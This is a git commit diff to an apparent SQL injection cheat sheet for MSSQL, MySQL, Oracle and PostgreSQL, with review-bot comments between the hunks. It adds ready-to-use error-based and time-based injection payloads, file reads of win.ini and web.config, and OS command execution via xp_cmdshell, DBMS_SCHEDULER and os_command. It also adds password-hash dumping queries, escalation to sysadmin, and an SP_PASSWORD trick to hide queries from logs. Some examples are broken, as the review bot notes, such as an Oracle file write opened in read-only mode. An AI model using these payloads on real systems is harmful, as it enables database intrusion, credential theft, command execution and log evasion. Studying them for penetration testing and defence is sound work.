SQL - File Manipulation and Error Based Injection
This commit is contained in:
parent
9a908a15d2
commit
3c5bab0338
@ -7,18 +7,19 @@
|
||||
|
||||
* [MSSQL Default Databases](#mssql-default-databases)
|
||||
* [MSSQL Comments](#mssql-comments)
|
||||
* [MSSQL Database Credentials](#mssql-database-credentials)
|
||||
* [MSSQL Enumeration](#mssql-enumeration)
|
||||
* [MSSQL List Databases](#mssql-list-databases)
|
||||
* [MSSQL List Columns](#mssql-list-columns)
|
||||
* [MSSQL List Tables](#mssql-list-tables)
|
||||
* [MSSQL List Columns](#mssql-list-columns)
|
||||
* [MSSQL Union Based](#mssql-union-based)
|
||||
* [MSSQL Error Based](#mssql-error-based)
|
||||
* [MSSQL Blind Based](#mssql-blind-based)
|
||||
* [MSSQL Blind With Substring Equivalent](#mssql-blind-with-substring-equivalent)
|
||||
* [MSSQL Time Based](#mssql-time-based)
|
||||
* [MSSQL Stacked Query](#mssql-stacked-query)
|
||||
* [MSSQL Read File](#mssql-read-file)
|
||||
* [MSSQL File Manipulation](#mssql-file-manipulation)
|
||||
* [MSSQL Read File](#mssql-read-file)
|
||||
* [MSSQL Write File](#mssql-write-file)
|
||||
* [MSSQL Command Execution](#mssql-command-execution)
|
||||
* [XP_CMDSHELL](#xp_cmdshell)
|
||||
* [Python Script](#python-script)
|
||||
@ -29,6 +30,8 @@
|
||||
* [MSSQL Privileges](#mssql-privileges)
|
||||
* [MSSQL List Permissions](#mssql-list-permissions)
|
||||
* [MSSQL Make User DBA](#mssql-make-user-dba)
|
||||
* [MSSQL Database Credentials](#mssql-database-credentials)
|
||||
* [MSSQL OPSEC](#mssql-opsec)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
@ -49,47 +52,34 @@
|
||||
| Type | Description |
|
||||
|----------------------------|-----------------------------------|
|
||||
| `/* MSSQL Comment */` | C-style comment |
|
||||
| `-- -` | SQL comment |
|
||||
| `--` | SQL comment |
|
||||
| `;%00` | Null byte |
|
||||
|
||||
|
||||
## MSSQL Database Credentials
|
||||
|
||||
* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
|
||||
```sql
|
||||
SELECT name, password FROM master..sysxlogins
|
||||
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
|
||||
-- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
|
||||
```
|
||||
* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe`
|
||||
```sql
|
||||
SELECT name, password_hash FROM master.sys.sql_logins
|
||||
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Enumeration
|
||||
|
||||
| Description | SQL Query |
|
||||
| ------------- | ----------------------------------------- |
|
||||
| DBMS version | `SELECT @@version` |
|
||||
| Database name | `SELECT DB_NAME()` |
|
||||
| Hostname | `SELECT HOST_NAME()` |
|
||||
| Hostname | `SELECT @@hostname` |
|
||||
| Hostname | `SELECT @@SERVERNAME` |
|
||||
| Hostname | `SELECT SERVERPROPERTY('productversion')` |
|
||||
| Hostname | `SELECT SERVERPROPERTY('productlevel')` |
|
||||
| Hostname | `SELECT SERVERPROPERTY('edition')` |
|
||||
| User | `SELECT CURRENT_USER` |
|
||||
| User | `SELECT user_name();` |
|
||||
| User | `SELECT system_user;` |
|
||||
| User | `SELECT user;` |
|
||||
| Description | SQL Query |
|
||||
| --------------- | ----------------------------------------- |
|
||||
| DBMS version | `SELECT @@version` |
|
||||
| Database name | `SELECT DB_NAME()` |
|
||||
| Database schema | `SELECT SCHEMA_NAME()` |
|
||||
| Hostname | `SELECT HOST_NAME()` |
|
||||
| Hostname | `SELECT @@hostname` |
|
||||
| Hostname | `SELECT @@SERVERNAME` |
|
||||
| Hostname | `SELECT SERVERPROPERTY('productversion')` |
|
||||
| Hostname | `SELECT SERVERPROPERTY('productlevel')` |
|
||||
| Hostname | `SELECT SERVERPROPERTY('edition')` |
|
||||
| User | `SELECT CURRENT_USER` |
|
||||
| User | `SELECT user_name();` |
|
||||
| User | `SELECT system_user;` |
|
||||
| User | `SELECT user;` |
|
||||
|
||||
|
||||
### MSSQL List Databases
|
||||
|
||||
```sql
|
||||
SELECT name FROM master..sysdatabases;
|
||||
SELECT name FROM master.sys.databases;
|
||||
|
||||
-- for N = 0, 1, 2, …
|
||||
SELECT DB_NAME(N);
|
||||
@ -99,6 +89,25 @@ SELECT DB_NAME(N);
|
||||
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases;
|
||||
```
|
||||
|
||||
### MSSQL List Tables
|
||||
|
||||
```sql
|
||||
-- use xtype = 'V' for views
|
||||
SELECT name FROM master..sysobjects WHERE xtype = 'U';
|
||||
SELECT name FROM <DBNAME>..sysobjects WHERE xtype='U'
|
||||
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
|
||||
|
||||
-- list column names and types for master..sometable
|
||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
|
||||
|
||||
SELECT table_catalog, table_name FROM information_schema.columns
|
||||
SELECT table_name FROM information_schema.tables WHERE table_catalog='<DBNAME>'
|
||||
|
||||
-- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
|
||||
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
|
||||
```
|
||||
|
||||
|
||||
### MSSQL List Columns
|
||||
|
||||
```sql
|
||||
@ -109,23 +118,8 @@ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '
|
||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
|
||||
|
||||
SELECT table_catalog, column_name FROM information_schema.columns
|
||||
```
|
||||
|
||||
### MSSQL List Tables
|
||||
|
||||
```sql
|
||||
-- use xtype = 'V' for views
|
||||
SELECT name FROM master..sysobjects WHERE xtype = 'U';
|
||||
|
||||
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
|
||||
|
||||
-- list column names and types for master..sometable
|
||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
|
||||
|
||||
SELECT table_catalog, table_name FROM information_schema.columns
|
||||
|
||||
-- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
|
||||
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
|
||||
SELECT COL_NAME(OBJECT_ID('<DBNAME>.<TABLE_NAME>'), <INDEX>)
|
||||
```
|
||||
|
||||
|
||||
@ -166,6 +160,13 @@ SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
|
||||
|
||||
## MSSQL Error Based
|
||||
|
||||
| Name | Payload |
|
||||
| ------------ | --------------- |
|
||||
| CONVERT | `AND 1337=CONVERT(INT,(SELECT '~'+(SELECT @@version)+'~')) -- -` |
|
||||
| IN | `AND 1337 IN (SELECT ('~'+(SELECT @@version)+'~')) -- -` |
|
||||
| EQUAL | `AND 1337=CONCAT('~',(SELECT @@version),'~') -- -` |
|
||||
| CAST | `CAST((SELECT @@version) AS INT)` |
|
||||
|
||||
* For integer inputs
|
||||
|
||||
```sql
|
||||
@ -249,15 +250,31 @@ IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Read File
|
||||
## MSSQL File Manipulation
|
||||
|
||||
### MSSQL Read File
|
||||
|
||||
**Permissions**: The `BULK` option requires the `ADMINISTER BULK OPERATIONS` or the `ADMINISTER DATABASE BULK OPERATIONS` permission.
|
||||
|
||||
|
||||
```sql
|
||||
OPENROWSET(BULK 'C:\path\to\file', SINGLE_CLOB)
|
||||
```
|
||||
|
||||
Example:
|
||||
|
||||
```sql
|
||||
-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null
|
||||
```
|
||||
|
||||
|
||||
### MSSQL Write File
|
||||
|
||||
```sql
|
||||
execute spWriteStringToFile 'contents', 'C:\path\to\', 'file'
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Command Execution
|
||||
|
||||
### XP_CMDSHELL
|
||||
@ -268,7 +285,7 @@ EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
|
||||
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
|
||||
```
|
||||
|
||||
If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
|
||||
If you need to reactivate `xp_cmdshell` (disabled by default in SQL Server 2005)
|
||||
|
||||
```sql
|
||||
EXEC sp_configure 'show advanced options',1;
|
||||
@ -282,7 +299,6 @@ RECONFIGURE;
|
||||
> Executed by a different user than the one using `xp_cmdshell` to execute commands
|
||||
|
||||
```powershell
|
||||
# Print the user being used (and execute commands)
|
||||
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
|
||||
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
|
||||
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
|
||||
@ -401,6 +417,21 @@ EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Database Credentials
|
||||
|
||||
* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
|
||||
```sql
|
||||
SELECT name, password FROM master..sysxlogins
|
||||
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
|
||||
-- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
|
||||
```
|
||||
* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe`
|
||||
```sql
|
||||
SELECT name, password_hash FROM master.sys.sql_logins
|
||||
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
|
||||
```
|
||||
|
||||
|
||||
## MSSQL OPSEC
|
||||
|
||||
Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_password`
|
||||
|
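Review bot: The new `SELECT COL_NAME(OBJECT_ID('<DBNAME>.<TABLE_NAME>'), <INDEX>)` line in the MSSQL List Columns hunk uses a two-part name, which SQL Server resolves as `schema.object`, not `database.object`, so the `<DBNAME>` placeholder would be read as a schema name; the cross-database form is `OBJECT_ID('<DBNAME>..<TABLE_NAME>')` or the full `<DBNAME>.<SCHEMA>.<TABLE_NAME>`. In the re-ordered enumeration table, the three `SERVERPROPERTY('productversion')` / `'productlevel'` / `'edition'` rows are still labelled `Hostname` although they return version and edition information; `DBMS version` would match the label used on the `@@version` row above them. The `## MSSQL Database Credentials` block is moved unchanged, so the hashcat-mode notes survive the move; the table of contents still lists `MSSQL List Columns` twice, which the reorder appears not to have addressed.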
@ -69,7 +69,7 @@ MySQL comments are annotations in SQL code that are ignored by the MySQL server
|
||||
| `/* MYSQL Comment */` | C-style comment |
|
||||
| `/*! MYSQL Special SQL */` | Special SQL |
|
||||
| `/*!32302 10*/` | Comment for MYSQL version 3.23.02 |
|
||||
| `-- -` | SQL comment |
|
||||
| `--` | SQL comment |
|
||||
| `;%00` | Nullbyte |
|
||||
| \` | Backtick |
|
||||
|
||||
@ -229,6 +229,17 @@ MariaDB [dummydb]> SELECT AUTHOR_ID,TITLE FROM POSTS WHERE AUTHOR_ID=-1 UNION SE
|
||||
|
||||
## MYSQL Error Based
|
||||
|
||||
| Name | Payload |
|
||||
| ------------ | --------------- |
|
||||
| GTID_SUBSET | `AND GTID_SUBSET(CONCAT('~',(SELECT version()),'~'),1337) -- -` |
|
||||
| JSON_KEYS | `AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('~',(SELECT version()),'~')) USING utf8))) -- -` |
|
||||
| EXTRACTVALUE | `AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT version()),'~')) -- -` |
|
||||
| UPDATEXML | `AND UPDATEXML(1337,CONCAT('.','~',(SELECT version()),'~'),31337) -- -` |
|
||||
| EXP | `AND EXP(~(SELECT * FROM (SELECT CONCAT('~',(SELECT version()),'~','x'))x)) -- -` |
|
||||
| OR | `OR 1 GROUP BY CONCAT('~',(SELECT version()),'~',FLOOR(RAND(0)*2)) HAVING MIN(0) -- -` |
|
||||
| NAME_CONST | `AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--` |
|
||||
|
||||
|
||||
### MYSQL Error Based - Basic
|
||||
|
||||
Works with `MySQL >= 4.1`
|
||||
@ -373,6 +384,8 @@ The following SQL codes will delay the output from MySQL.
|
||||
RLIKE SLEEP([SLEEPTIME])
|
||||
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
|
||||
XOR(IF(NOW()=SYSDATE(),SLEEP(5),0))XOR
|
||||
AND SLEEP(10)=0
|
||||
AND (SELECT 1337 FROM (SELECT(SLEEP(10-(IF((1=1),0,10))))) RANDSTR)
|
||||
```
|
||||
|
||||
### Using SLEEP in a Subselect
|
||||
@ -662,12 +675,19 @@ mysql> SELECT @@version;
|
||||
| 5.6.31-0ubuntu0.15.10.1 |
|
||||
+-------------------------+
|
||||
|
||||
mysql> mysql> SELECT version();
|
||||
mysql> SELECT version();
|
||||
+-------------------------+
|
||||
| version() |
|
||||
+-------------------------+
|
||||
| 5.6.31-0ubuntu0.15.10.1 |
|
||||
+-------------------------+
|
||||
|
||||
mysql> SELECT @@GLOBAL.VERSION;
|
||||
+------------------+
|
||||
| @@GLOBAL.VERSION |
|
||||
+------------------+
|
||||
| 8.0.27 |
|
||||
+------------------+
|
||||
```
|
||||
|
||||
|
||||
|
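Review bot: In the new MYSQL Error Based table the `NAME_CONST` row terminates with a bare `--` while every other row uses the `-- -` form that the comment table on this page documents; for consistency end it with `-- -` as well. The two new time-based lines hard-code `10` where the neighbouring lines use the `[SLEEPTIME]` and `[RANDNUM]` placeholders, so `AND SLEEP([SLEEPTIME])=0` would keep the block's convention. The duplicated `mysql> mysql>` prompt is already fixed by this commit.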
@ -7,13 +7,12 @@
|
||||
|
||||
* [Oracle SQL Default Databases](#oracle-sql-default-databases)
|
||||
* [Oracle SQL Comments](#oracle-sql-comments)
|
||||
* [Oracle SQL Version](#oracle-sql-version)
|
||||
* [Oracle SQL Hostname](#oracle-sql-hostname)
|
||||
* [Oracle SQL Database Name](#oracle-sql-database-name)
|
||||
* [Oracle SQL Enumeration](#oracle-sql-enumeration)
|
||||
* [Oracle SQL Database Credentials](#oracle-sql-database-credentials)
|
||||
* [Oracle SQL List Databases](#oracle-sql-list-databases)
|
||||
* [Oracle SQL List Columns](#oracle-sql-list-columns)
|
||||
* [Oracle SQL List Tables](#oracle-sql-list-tables)
|
||||
* [Oracle SQL Methodology](#oracle-sql-methodology)
|
||||
* [Oracle SQL List Databases](#oracle-sql-list-databases)
|
||||
* [Oracle SQL List Tables](#oracle-sql-list-tables)
|
||||
* [Oracle SQL List Columns](#oracle-sql-list-columns)
|
||||
* [Oracle SQL Error Based](#oracle-sql-error-based)
|
||||
* [Oracle SQL Blind](#oracle-sql-blind)
|
||||
* [Oracle Blind With Substring Equivalent](#oracle-blind-with-substring-equivalent)
|
||||
@ -22,6 +21,11 @@
|
||||
* [Oracle SQL Command Execution](#oracle-sql-command-execution)
|
||||
* [Oracle Java Execution](#oracle-java-execution)
|
||||
* [Oracle Java Class](#oracle-java-class)
|
||||
* [OracleSQL File Manipulation](#OracleSQL-file-manipulation)
|
||||
* [OracleSQL Read File](#OracleSQL-read-file)
|
||||
* [OracleSQL Write File](#OracleSQL-write-file)
|
||||
* [Package os_command](#package-os_command)
|
||||
* [DBMS_SCHEDULER Jobs](#dbms_scheduler-jobs)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
@ -35,39 +39,30 @@
|
||||
|
||||
## Oracle SQL Comments
|
||||
|
||||
| Type | Description |
|
||||
|----------------------------|-----------------------------------|
|
||||
| `-- -` | SQL comment |
|
||||
| Type | Comment |
|
||||
| ------------------- | ------- |
|
||||
| Single-Line Comment | `--` |
|
||||
| Multi-Line Comment | `/**/` |
|
||||
|
||||
|
||||
## Oracle SQL Version
|
||||
## Oracle SQL Enumeration
|
||||
|
||||
```sql
|
||||
SELECT user FROM dual UNION SELECT * FROM v$version
|
||||
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
|
||||
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
|
||||
SELECT version FROM v$instance;
|
||||
```
|
||||
|
||||
|
||||
## Oracle SQL Hostname
|
||||
|
||||
```sql
|
||||
SELECT host_name FROM v$instance; (Privileged)
|
||||
SELECT UTL_INADDR.get_host_name FROM dual;
|
||||
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
|
||||
SELECT UTL_INADDR.get_host_address FROM dual;
|
||||
```
|
||||
|
||||
|
||||
## Oracle SQL Database Name
|
||||
|
||||
```sql
|
||||
SELECT global_name FROM global_name;
|
||||
SELECT name FROM V$DATABASE;
|
||||
SELECT instance_name FROM V$INSTANCE;
|
||||
SELECT SYS.DATABASE_NAME FROM DUAL;
|
||||
```
|
||||
| Description | SQL Query |
|
||||
| ------------- | ------------------------------------------------------------ |
|
||||
| DBMS version | `SELECT user FROM dual UNION SELECT * FROM v$version` |
|
||||
| DBMS version | `SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';` |
|
||||
| DBMS version | `SELECT banner FROM v$version WHERE banner LIKE 'TNS%';` |
|
||||
| DBMS version | `SELECT BANNER FROM gv$version WHERE ROWNUM = 1;` |
|
||||
| DBMS version | `SELECT version FROM v$instance;` |
|
||||
| Hostname | `SELECT UTL_INADDR.get_host_name FROM dual;` |
|
||||
| Hostname | `SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;` |
|
||||
| Hostname | `SELECT UTL_INADDR.get_host_address FROM dual;` |
|
||||
| Hostname | `SELECT host_name FROM v$instance;` |
|
||||
| Database name | `SELECT global_name FROM global_name;` |
|
||||
| Database name | `SELECT name FROM V$DATABASE;` |
|
||||
| Database name | `SELECT instance_name FROM V$INSTANCE;` |
|
||||
| Database name | `SELECT SYS.DATABASE_NAME FROM DUAL;` |
|
||||
| Database name | `SELECT sys_context('USERENV', 'CURRENT_SCHEMA') FROM dual;` |
|
||||
|
||||
|
||||
## Oracle SQL Database Credentials
|
||||
@ -79,27 +74,29 @@ SELECT SYS.DATABASE_NAME FROM DUAL;
|
||||
| `SELECT name, spare4 from sys.user$;` | Privileged, <= 11g |
|
||||
|
||||
|
||||
## Oracle SQL List Databases
|
||||
## Oracle SQL Methodology
|
||||
|
||||
### Oracle SQL List Databases
|
||||
|
||||
```sql
|
||||
SELECT DISTINCT owner FROM all_tables;
|
||||
SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)
|
||||
```
|
||||
|
||||
|
||||
## Oracle SQL List Columns
|
||||
|
||||
```sql
|
||||
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
|
||||
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
|
||||
```
|
||||
|
||||
|
||||
## Oracle SQL List Tables
|
||||
### Oracle SQL List Tables
|
||||
|
||||
```sql
|
||||
SELECT table_name FROM all_tables;
|
||||
SELECT owner, table_name FROM all_tables;
|
||||
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
|
||||
SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='<DBNAME>'
|
||||
```
|
||||
|
||||
### Oracle SQL List Columns
|
||||
|
||||
```sql
|
||||
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
|
||||
SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='<TABLE_NAME>' AND OWNER='<DBNAME>'
|
||||
```
|
||||
|
||||
|
||||
@ -115,6 +112,8 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
|
||||
| SQL Error | `SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))` |
|
||||
| XDBURITYPE getblob | `XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()` |
|
||||
| XDBURITYPE getclob | `XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()` |
|
||||
| XMLType | `AND 1337=(SELECT UPPER(XMLType(CHR(60)\|\|CHR(58)\|\|'~'\|\|(REPLACE(REPLACE(REPLACE(REPLACE((SELECT banner FROM v$version),' ','_'),'$','(DOLLAR)'),'@','(AT)'),'#','(HASH)'))\|\|'~'\|\|CHR(62))) FROM DUAL) -- -` |
|
||||
| DBMS_UTILITY | `AND 1337=DBMS_UTILITY.SQLID_TO_SQLHASH('~'\|\|(SELECT banner FROM v$version)\|\|'~') -- -` |
|
||||
|
||||
When the injection point is inside a string use : `'||PAYLOAD--`
|
||||
|
||||
@ -141,6 +140,7 @@ When the injection point is inside a string use : `'||PAYLOAD--`
|
||||
|
||||
```sql
|
||||
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
|
||||
AND 1337=(CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10) ELSE 1337 END)
|
||||
```
|
||||
|
||||
|
||||
@ -209,7 +209,38 @@ SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE roo
|
||||
|
||||
```sql
|
||||
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
|
||||
```
|
||||
```
|
||||
|
||||
|
||||
### Package os_command
|
||||
|
||||
```sql
|
||||
SELECT os_command.exec_clob('<COMMAND>') cmd from dual
|
||||
```
|
||||
|
||||
### DBMS_SCHEDULER Jobs
|
||||
|
||||
```sql
|
||||
DBMS_SCHEDULER.CREATE_JOB (job_name => 'exec', job_type => 'EXECUTABLE', job_action => '<COMMAND>', enabled => TRUE)
|
||||
```
|
||||
|
||||
|
||||
## OracleSQL File Manipulation
|
||||
|
||||
:warning: Only in a stacked query.
|
||||
|
||||
### OracleSQL Read File
|
||||
|
||||
```sql
|
||||
utl_file.get_line(utl_file.fopen('/path/to/','file','R'), <buffer>)
|
||||
```
|
||||
|
||||
### OracleSQL Write File
|
||||
|
||||
```sql
|
||||
utl_file.put_line(utl_file.fopen('/path/to/','file','R'), <buffer>)
|
||||
```
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
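Review bot: The new `### OracleSQL Write File` example reuses the read example's handle, `utl_file.fopen('/path/to/','file','R')`, and `'R'` is UTL_FILE's read-only open mode, so `put_line` on that handle cannot write as documented; the write example should open the file in the package's write or append mode, and both examples appear to pass a filesystem path where `UTL_FILE.FOPEN` takes a directory object name (worth confirming against the package reference). In the new enumeration table, `SELECT host_name FROM v$instance;` has lost the `(Privileged)` caveat the old code block carried, so the permission requirement should be restated in the row, e.g. `| Hostname (privileged) | ... |`. The last row, `sys_context('USERENV', 'CURRENT_SCHEMA')`, is labelled `Database name` but returns the current schema; `Database schema` would match the label this same commit uses in the MSSQL and PostgreSQL tables.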
@ -6,12 +6,8 @@
|
||||
## Summary
|
||||
|
||||
* [PostgreSQL Comments](#postgresql-comments)
|
||||
* [PostgreSQL Version](#postgresql-version)
|
||||
* [PostgreSQL Current User](#postgresql-current-user)
|
||||
* [PostgreSQL Privileges](#postgresql-privileges)
|
||||
* [PostgreSQL List Privileges](#postgresql-list-privileges)
|
||||
* [PostgreSQL Superuser Role](#postgresql-superuser-role)
|
||||
* [PostgreSQL Enumeration](#postgresql-enumeration)
|
||||
* [PostgreSQL Methodology](#postgresql-methodology)
|
||||
* [PostgreSQL Error Based](#postgresql-error-based)
|
||||
* [PostgreSQL XML Helpers](#postgresql-xml-helpers)
|
||||
* [PostgreSQL Blind](#postgresql-blind)
|
||||
@ -27,72 +23,65 @@
|
||||
* [Using libc.so.6](#using-libcso6)
|
||||
* [PostgreSQL WAF Bypass](#postgresql-waf-bypass)
|
||||
* [Alternative to Quotes](#alternative-to-quotes)
|
||||
* [PostgreSQL Privileges](#postgresql-privileges)
|
||||
* [PostgreSQL List Privileges](#postgresql-list-privileges)
|
||||
* [PostgreSQL Superuser Role](#postgresql-superuser-role)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## PostgreSQL Comments
|
||||
|
||||
| Type | Comment |
|
||||
| ---- | ------- |
|
||||
| Single-Line Comment | `--` |
|
||||
| Multi-Line Comment | `/**/` |
|
||||
| Type | Comment |
|
||||
| ------------------- | ------- |
|
||||
| Single-Line Comment | `--` |
|
||||
| Multi-Line Comment | `/**/` |
|
||||
|
||||
|
||||
## PostgreSQL Version
|
||||
|
||||
```sql
|
||||
SELECT version()
|
||||
```
|
||||
|
||||
## PostgreSQL Current User
|
||||
|
||||
```sql
|
||||
SELECT user;
|
||||
SELECT current_user;
|
||||
SELECT session_user;
|
||||
SELECT usename FROM pg_user;
|
||||
SELECT getpgusername();
|
||||
```
|
||||
|
||||
|
||||
## PostgreSQL Privileges
|
||||
|
||||
### PostgreSQL List Privileges
|
||||
|
||||
Retrieve all table-level privileges for the current user, excluding tables in system schemas like `pg_catalog` and `information_schema`.
|
||||
|
||||
```sql
|
||||
SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema');
|
||||
```
|
||||
|
||||
### PostgreSQL Superuser Role
|
||||
|
||||
```sql
|
||||
SHOW is_superuser;
|
||||
SELECT current_setting('is_superuser');
|
||||
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
|
||||
```
|
||||
|
||||
## PostgreSQL Enumeration
|
||||
|
||||
| SQL Query | Description |
|
||||
| --------------------------------------- | -------------- |
|
||||
| `SELECT current_database()` | Database Name |
|
||||
| `SELECT datname FROM pg_database` | List Databases |
|
||||
| `SELECT table_name FROM information_schema.tables` | List Tables |
|
||||
| `SELECT column_name FROM information_schema.columns WHERE table_name='data_table'` | List Columns |
|
||||
| `SELECT usename FROM pg_user` | List PostgreSQL Users |
|
||||
| `SELECT usename, passwd FROM pg_shadow` | List Password Hashes |
|
||||
| `SELECT usename FROM pg_user WHERE usesuper IS TRUE` | List Database Administrator Accounts |
|
||||
| Description | SQL Query |
|
||||
| ---------------------- | --------------------------------------- |
|
||||
| DBMS version | `SELECT version()` |
|
||||
| Database Name | `SELECT CURRENT_DATABASE()` |
|
||||
| Database Schema | `SELECT CURRENT_SCHEMA()` |
|
||||
| List PostgreSQL Users | `SELECT usename FROM pg_user` |
|
||||
| List Password Hashes | `SELECT usename, passwd FROM pg_shadow` |
|
||||
| List DB Administrators | `SELECT usename FROM pg_user WHERE usesuper IS TRUE` |
|
||||
| Current User | `SELECT user;` |
|
||||
| Current User | `SELECT current_user;` |
|
||||
| Current User | `SELECT session_user;` |
|
||||
| Current User | `SELECT usename FROM pg_user;` |
|
||||
| Current User | `SELECT getpgusername();` |
|
||||
|
||||
|
||||
## PostgreSQL Methodology
|
||||
|
||||
| Description | SQL Query |
|
||||
| ---------------------- | -------------------------------------------- |
|
||||
| List Schemas | `SELECT DISTINCT(schemaname) FROM pg_tables` |
|
||||
| List Databases | `SELECT datname FROM pg_database` |
|
||||
| List Tables | `SELECT table_name FROM information_schema.tables` |
|
||||
| List Tables | `SELECT table_name FROM information_schema.tables WHERE table_schema='<SCHEMA_NAME>'` |
|
||||
| List Tables | `SELECT tablename FROM pg_tables WHERE schemaname = '<SCHEMA_NAME>'` |
|
||||
| List Columns | `SELECT column_name FROM information_schema.columns WHERE table_name='data_table'` |
|
||||
|
||||
|
||||
## PostgreSQL Error Based
|
||||
|
||||
| Name | Payload |
|
||||
| ------------ | --------------- |
|
||||
| CAST | `AND 1337=CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC) -- -` |
|
||||
| CAST | `AND (CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC)) -- -` |
|
||||
| CAST | `AND CAST((SELECT version()) AS INT)=1337 -- -` |
|
||||
| CAST | `AND (SELECT version())::int=1 -- -` |
|
||||
|
||||
|
||||
|
||||
```sql
|
||||
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
|
||||
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
|
||||
CAST(chr(126)||VERSION()||chr(126) AS NUMERIC)
|
||||
